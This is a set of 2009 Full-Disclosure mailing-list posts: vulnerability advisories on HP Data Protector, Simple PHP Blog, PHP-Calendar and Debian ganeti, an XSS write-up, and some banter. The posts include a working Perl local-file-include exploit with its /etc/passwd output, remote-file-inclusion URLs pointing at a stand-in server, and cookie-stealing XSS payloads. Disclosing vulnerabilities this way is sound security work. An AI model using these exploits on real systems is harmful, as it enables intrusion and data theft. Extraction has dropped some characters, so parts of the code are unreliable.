[Full-disclosure] TPTI-09-15: HP OpenView Data Protector Cell Manager Heap Overflow Vulnerability
TPTI-09-15: HP OpenView Data Protector Cell Manager Heap Overflow Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-09-15 December 17, 2009 -- CVE ID: CVE-2007-2281 -- Affected Vendors: Hewlett-Packard -- Affected Products: Hewlett-Packard OpenView -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 4730. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard OpenView Data Protector. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Cell Manager Database Service, rds.exe, which binds to TCP port 1530. The service receives socket data via _ncp32._NtrpTCPReceiveMsg() in the following format: [0xB6298C23][4-byte size][][data] The specified size parameter is subsequently used as the size parameter to the memory allocation routines _rm32.rm_getMem(). Due to a lack of sanity checking, values between 0xFFF8 and 0x result in an integer overflow and therefore an under allocated heap buffer. The following excerpt demonstrates this problem: 10004A57 mov eax, [ebp+arg_0] ; specified size 10004A5A add eax, 8 ; integer overflow 10004A5D push eax 10004A5E call ds:__imp__malloc The original packet data is later written to the under allocated buffer using a size specifier equal to the number of bytes actually received as the following excerpt from _ncp32._NtrpTCPReceiveMsg() shows: 002F2E77 mov eax, [ebp+received_length] 002F2E7A push eax; size_t 002F2E7B mov ecx, [ebp+received_data] 002F2E7E push ecx; src 002F2E7F mov edx, [ebp+allocated_buffer] 002F2E82 mov eax, [edx] 002F2E84 push eax; dst 002F2E85 call _memcpy This issue can be exploited to overwrite a specified DWORD of memory and further lead to arbitrary code execution. -- Vendor Response: -- Disclosure Timeline: 2006-10-10 - Vulnerability reported to vendor 2009-12-17 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Pedram Amini, TippingPoint DVLabs * Anonymous ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ISecAuditors Security Advisories] Simple PHP Blog = 0.5.1 Local File Include vulnerability
=
INTERNET SECURITY AUDITORS ALERT 2009-005
- Original release date: March 2nd, 2009
- Last revised: December 18th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.8/10 (CVSS scored)
=
I. VULNERABILITY
-
Simple PHP Blog = 0.5.1 Local File Include vulnerability
II. BACKGROUND
-
Simple PHP Blog is a blog system does not requires database setup, and
is very easy to install.
III. DESCRIPTION
-
Simple PHP Blog = 0.5.1 is affected by a Local File Include
vulnerability in 'languages_cgi.php' due to parameter 'blog_language1'
is not properly sanitized.
IV. PROOF OF CONCEPT
-
The affected code:
62 require_once('languages/' . $_POST[ 'blog_language1' ] .
'/strings.php');
Exploit:
#!/usr/bin/perl
# Local File Include Exploit
# Simple PHP Blog = 0.5.1
# jgaliana at isecauditors=dot=com
# Internet Security Auditors
use LWP::UserAgent;
if ($#ARGV 3) { die(Usage: $0 site path file cookie); }
$ua = LWP::UserAgent-new;
$ua-agent(Simple PHP Blog Exploit ^_^);
$ua-default_header('Cookie' = sid=$ARGV[3]);
my $req = new HTTP::Request POST =
http://$ARGV[0]$ARGV[1]/languages_cgi.php;;
$req-content_type('application/x-www-form-urlencoded');
$req-content(blog_language1=../../../../..$ARGV[2]%00);
my $res = $ua-request($req);
if ($res-is_success) {
print $res-content;
} else {
print Error: .$res-status_line, \n;
}
$ perl simple.pl example.com /blog /etc/passwd my_cookie_here|head -1
root:*:0:0:root:/root:/bin/bash
The bug can be exploited with or without 'magic_quotes_gpc', but note
that if magic_quotes_gpc is set to Off, an attacker can view any file,
adding a '\0' character like /etc/passwd, if not only can include php
files, allowing to execute any local php files.
V. BUSINESS IMPACT
-
The impact is the attacker can read arbitrary files in the context of
the webserver and execute arbitrary local php scripts.
VI. SYSTEMS AFFECTED
-
Versions prior and including 0.5.1 are affected
In order to patch the application the function file_exists() and
basename() must be added to the affected code.
VII. SOLUTION
-
Change line 62 of languages_cgi.php in order to filter $_POST[
'blog_language1' ] variable.
if (ereg('^[a-zA-Z0-9_]+$', $_POST[ 'blog_language1' ]))
require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');
VIII. REFERENCES
-
http://www.simplephpblog.com
http://sourceforge.net/projects/sphpblog/
http://www.isecauditors.com
IX. CREDITS
-
This vulnerability has been discovered and reported
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
X. REVISION HISTORY
-
March 02, 2009: Initial release.
December 18, 2009: Last revision.
XI. DISCLOSURE TIMELINE
-
March 02, 2009: Vulnerability acquired by
Internet Security Auditors (www.isecauditors.com)
March 03, 2009: Notified to developer. No response.
December 13, 2009: Notified again. No response.
December 18, 2009: Added mitigation solution and sent to lists.
XII. LEGAL NOTICES
-
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ISecAuditors Security Advisories] PHP-Calendar = v1.1 'configfile' Remote and Local File Inclusion vulnerability
=
INTERNET SECURITY AUDITORS ALERT 2009-011
- Original release date: October 13th, 2009
- Last revised: December 18th, 2009
- Discovered by: Juan Galiana Lara
- CVE ID: CVE-2009-3702
- Severity: 8.5/10 (CVSS Base Score)
=
I. VULNERABILITY
-
PHP-Calendar v1.1 'configfile' Remote and Local File Inclusion
vulnerability
II. BACKGROUND
-
PHP-Calendar is a simple web calendar. It is targeted towards groups
that need to collaboratively create and track events. In that same
collaborative spirit, the source for PHP-Calendar is available under
an open source license for anyone to use and modify.
III. DESCRIPTION
-
The 'configfile' variable is not properly filtered, and is possible to
include arbitrary remote and local files. This attack may lead to the
execution of arbitrary code.
The snippet of vulnerable code (part of update08.php and update10.php
file):
36 } elseif(!empty($_GET['configfile'])) {
37 if(file_exists($_GET['configfile'])) {
38 require_once($_GET['configfile']);
In order to include remote files, the value 'On' in the
allow_url_fopen directive is needed. There are two cases in which it
is possible remote code execution due to bypass the file_exists function:
1) If the victim server is running Windows operating system and there
is not a firewall filtering outgoing SMB requests, an attacker can use
an URL like //servername/path/to/file.php
2) If server is running PHP version 5.0.0 (the most common) an
attacker can use FTP/FTPS protocol for inclusion. Like
ftp://servername/path/to/file.php See references for more information.
IV. PROOF OF CONCEPT
-
For including remote files:
http://site/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php
http://site/php-calendar-1.1/update08.php?configfile=ftp://guest:p...@site/path/to/file.php
http://site/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php
http://site/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php
Local files, this PoC will show the /etc/passwd file:
http://site/php-calendar-1.1/update08.php?configfile=/etc/passwd
http://site/php-calendar-1.1/update10.php?configfile=/etc/passwd
V. BUSINESS IMPACT
-
Unauthenticated users can view any local file in the filesystem and
could execute arbitrary code remotely.
VI. SYSTEMS AFFECTED
-
PHP-Calendar version 1.1 is vulnerable, others may be affected
VII. SOLUTION
-
Change the code of update08.php (line 38) and update10.php (line 35)
in order to filter $_GET['configfile'] variable.
if (ereg('^[a-zA-Z0-9_]+$', $_GET['configfile']))
require_once($_GET['configfile']);
III. REFERENCES
-
http://www.php-calendar.com/
http://www.php.net/manual/en/wrappers.ftp.php
http://www.isecauditors.com/
IX. CREDITS
-
This vulnerability has been discovered by
Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
X. REVISION HISTORY
-
October 13, 2009: Initial release.
October 19, 2009: Added CVE id.
December 18, 2009: Last revision.
XI. DISCLOSURE TIMELINE
-
October 13, 2009: Vulnerability discovered by
Internet Security Auditors (www.isecauditors.com)
October 13, 2009: Sent to developers. No response.
December 13, 2009: Contact again. No response.
December 18, 2009: Added mitigation solution and sent to lists.
XII. LEGAL NOTICES
-
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS vulnerabilities via errors at requests to DB
Hello participants of Full-Disclosure. Let's continue a series of my articles about the most common places of XSS. Earlier I wrote already about XSS vulnerabilities at 404 pages (http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071664.html). And already at 2008 I planned to tell about one interesting and widespread vector of XSS attacks - it's the attacks via errors at requests to DB. I had occasions to discover Cross-Site Scripting vulnerabilities in different web applications, and also in browsers and web servers. And besides XSS holes at Error 404 pages, I also often found XSS vulnerabilities in messages about errors at requests to databases (XSS via SQL Error). Standard vector of the attack in case of XSS via SQL Error - it's setting of XSS-code as value of parameter which is sending to DB (at this it's needed that this SQL query becomes incorrect). Which will lead to showing of web application's message about error at request to DB, with mentioning of the query's line where there is an error, and to executing of JavaScript code in browser of the user. XSS: http://site/script?param=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E Such vulnerabilities I found multiple times at different sites and in different web applications, particularly in WordPress (http://websecurity.com.ua/298/), Relay (http://websecurity.com.ua/2075/) and Hydra Engine (http://websecurity.com.ua/3453/). For example, in WordPress to execute JS-code in error message, it was needed to send special symbol (in this case %A0), which I wrote about already in detail (http://websecurity.com.ua/298/). XSS: http://site/?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E In some cases (particularly in PHP-applications which use MySQL), it's needed to use not script tag, but body tag to conduct XSS attack, so the code will be completely showed in message about error in SQL query. As, for example, in case of vulnerability at www.zemerl.com (http://websecurity.com.ua/3327/). XSS: http://site/script?param='%20and%20%3Cbody%20onload=alert(document.cookie)%3E Note, that already in 2006 there was found vulnerability in PHP (http://websecurity.com.ua/225/), which concerned with function mysql_error. Which returns value of error of last SQL-query to MySQL in unfiltered form, which can lead to XSS attack. This vulnerability was found in PHP 4.4.x and 5.1.x. So web applications, which use this function and show its results, can be vulnerable to XSS. So web developers always need to check their projects on presence of XSS vulnerabilities in messages about errors at requests to DB. To not allow such vulnerabilities. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA-1959-1] New ganeti packages fix arbitrary command execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1959-1 secur...@debian.org http://www.debian.org/security/ Raphael Geissert December 19, 2009 http://www.debian.org/security/faq - Package: ganeti Vulnerability : missing input sanitation Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2009-4261 It was discovered that ganeti, a virtual server cluster manager, does not validate the path of scripts passed as arguments to certain commands, which allows local or remote users (via the web interface in versions 2.x) to execute arbitrary commands on a host acting as a cluster master. For the stable distribution (lenny), this problem has been fixed in version 1.2.6-3+lenny2. For the testing distribution (squeeze), this problem will be fixed in version 2.0.5-1. For the unstable distribution (sid), this problem has been fixed in version 2.0.5-1. The oldstable distribution (etch) does not include ganeti. We recommend that you upgrade your ganeti packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny (stable) - - Source archives: http://security.debian.org/pool/updates/main/g/ganeti/ganeti_1.2.6-3+lenny2.diff.gz Size/MD5 checksum: 6912 766a061e63ca295c83ec9d81e71790f6 http://security.debian.org/pool/updates/main/g/ganeti/ganeti_1.2.6.orig.tar.gz Size/MD5 checksum: 843282 ccc54866e02be044987027a827b1be03 http://security.debian.org/pool/updates/main/g/ganeti/ganeti_1.2.6-3+lenny2.dsc Size/MD5 checksum: 1443 6de6851e7ad49a555b9d7cafd65cf0c0 Architecture independent packages: http://security.debian.org/pool/updates/main/g/ganeti/ganeti_1.2.6-3+lenny2_all.deb Size/MD5 checksum: 705030 dc11dab47b08a83d4023c213a989f08c These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-annou...@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iD8DBQFLLNVBbxelr8HyTqQRAseBAKDUL3J0MX29aNCfuDgOxvbPP2j/JwCgzUX4 V0dz6RLBz5fhU4WH4zUOy/M= =4h++ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS vulnerabilities via errors at requests to DB
Dear MustLive, Earlier I wrote already about XSS vulnerabilities at 404 pages (http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071664.html). And already at 2008 I planned to tell about one interesting and widespread vector of XSS attacks - it's the attacks via errors at requests to DB. Thank you this excellent research! Given your contributions in this area, I was hoping you could offer me some advice: I recently stumbled upon an XSS flaw on a page with vaguely turquoise background. I am not sure whether to classify this as a separate class of a web vulnerability, or merely a novel extension of well-established XSS attacks against sky blue targets? Sincerely, /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS vulnerabilities via errors at requests to DB
I agree with Mostafa. Leaving DB errors on a production web application is not a good thing: more than that, hundreds of articles have been written about Information Disclosure/Leakage (as you want to call it). Some months about I was blogging on reflected XSS in Java Exception stack trace: nice to find it (as Stefano did many years ago about SQL errors), really funny: More informations about some of my advisories on my blog: http://antisnatchor.com/2008/12/18/eclipse-birt-reflected-xss/ http://antisnatchor.com/2009/03/10/riotfamily-release-80-xss/ Greetz Michele antisnatchor Orru' On Fri, Dec 18, 2009 at 3:58 PM, MustLive mustl...@websecurity.com.ua wrote: Hello participants of Full-Disclosure. Let's continue a series of my articles about the most common places of XSS. Earlier I wrote already about XSS vulnerabilities at 404 pages (http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071664.html). And already at 2008 I planned to tell about one interesting and widespread vector of XSS attacks - it's the attacks via errors at requests to DB. I had occasions to discover Cross-Site Scripting vulnerabilities in different web applications, and also in browsers and web servers. And besides XSS holes at Error 404 pages, I also often found XSS vulnerabilities in messages about errors at requests to databases (XSS via SQL Error). Standard vector of the attack in case of XSS via SQL Error - it's setting of XSS-code as value of parameter which is sending to DB (at this it's needed that this SQL query becomes incorrect). Which will lead to showing of web application's message about error at request to DB, with mentioning of the query's line where there is an error, and to executing of JavaScript code in browser of the user. XSS: http://site/script?param=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E Such vulnerabilities I found multiple times at different sites and in different web applications, particularly in WordPress (http://websecurity.com.ua/298/), Relay (http://websecurity.com.ua/2075/) and Hydra Engine (http://websecurity.com.ua/3453/). For example, in WordPress to execute JS-code in error message, it was needed to send special symbol (in this case %A0), which I wrote about already in detail (http://websecurity.com.ua/298/). XSS: http://site/?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E In some cases (particularly in PHP-applications which use MySQL), it's needed to use not script tag, but body tag to conduct XSS attack, so the code will be completely showed in message about error in SQL query. As, for example, in case of vulnerability at www.zemerl.com (http://websecurity.com.ua/3327/). XSS: http://site/script?param='%20and%20%3Cbody%20onload=alert(document.cookie)%3E Note, that already in 2006 there was found vulnerability in PHP (http://websecurity.com.ua/225/), which concerned with function mysql_error. Which returns value of error of last SQL-query to MySQL in unfiltered form, which can lead to XSS attack. This vulnerability was found in PHP 4.4.x and 5.1.x. So web applications, which use this function and show its results, can be vulnerable to XSS. So web developers always need to check their projects on presence of XSS vulnerabilities in messages about errors at requests to DB. To not allow such vulnerabilities. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Global warming - it's all about the money
...it's hard to know what's true in the comings and goings of men throughout the world Follow the money. On Tue, Dec 15, 2009 at 11:09 AM, Jared DeMott jared.dem...@harris.com wrote: Paul Schmehl wrote: http://www.wnd.com/index.php?fa=PAGE.viewpageId=118953 Businesses hold world hostage over carbon credits Even U.N. climate chief tied to new, 'green' extortion scam It was never about the climate. Not sure about all that, but it is sad that it's hard to know what's true in the comings and goings of men throughout the world. Fortunately there are fundamental Truths you can hang your hat on. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
